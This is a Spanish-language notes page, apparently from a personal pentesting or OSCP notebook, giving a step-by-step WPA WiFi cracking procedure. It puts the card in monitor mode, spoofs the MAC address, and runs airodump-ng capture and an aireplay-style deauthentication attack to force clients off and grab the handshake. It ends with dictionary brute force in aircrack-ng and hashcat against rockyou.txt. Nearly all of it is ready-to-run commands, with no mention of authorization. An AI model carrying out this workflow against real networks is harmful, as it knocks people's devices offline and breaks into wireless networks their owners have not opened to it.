search
Page cover

Hacking WiFi

  1. Para empezar tenemos que poner nuestra placa en modo monitor con

airmon-ng start wlan0

  1. Despues matamos todos los procesos posibles que nos puedan dar problemas luego.

airmon-ng check kill

  1. Luego para cambiar la mac tendremos que hacer lo siguiente:

    1. ifconfig wlan0mon down

    2. macchanger --mac=00:20:91:da:1b:6a wlan0mon

    3. ifconfig wlan0mon up

  2. Y ahora deberiamos poder ver que la mac actual esta cambiada:

  1. Ahora nos ponemos en escucha con airodump-ng wlan0mon

  1. Identificamos la red que queremos crackear y le sacamos el BSSID y el canal por donde esta, ejecutamos de vuelta el airodump-ng wlan0mon <BSSID> --channel <CANAL>

Ahora tenemos que seleccionar un dispositivo que por preferencia este generando paquetes para hacer el ataque de deautenticacion y asi capturar el handshake

  1. Izquierdo: Una vez que tenemos la MAC del dispositivo, le vamos a hacer un ataque de deautenticacion para que cuando se vuelva a conectar, capturemos el handshake

circle-info

-0 = Significa el tipo de ataque, en este caso Deautenticacion y el numero siguente, la cantidad de paquetes a enviar.

  1. Lado Derecho: Nos ponemos a escuchar por el mismo canal y solo a la bssid objetivo, y todo el output lo escribimos en un archivo que elijamos, en este caso Chiambret

  1. Despues de esto enviamos el ataque y cuando el dispositivo se conecte de vuelta, vamos a capturar el handshake

  1. Ahora con el handshake capturado solo nos queda hacerle un ataque de fuerza bruta con un diccionario y esperar a tener suerte que la contraseña este ahi.

gg

En caso de que quiseramos utilizar hashcat para hacer uso de nuestra GPU, deberiamos hacer lo siguiente:

  1. Pasar el archivo .cap a un formato el cual hashcat pueda utilizar, para esto se puede utilizar aircrack o cap2hccapx.bin, el cual se encuentra en /usr/share/hashcat-utils

aircrack-ng -j hashcatCapture Chiambrett.cap

./cap2hccapx.bin /home/rulo/SantaRosa/Chiambret.cap Chiambret.hccapx

  1. Una vez ya tengamos el archivo creado, solo nos queda ejecutar hashcat

hashcat -m 2500 -d 1 Chiambret.hccapx rockyou.txt --deprecated-check-disable

  1. Y cuando termine el proceso, podemos ver si fue crackeado con exito de la siguiente manera:

hashcat --show -m 2500 Chiambret.hccapx --deprecated-check-disable

AnteriorBuffer Overflow Prep OSCP

Última actualización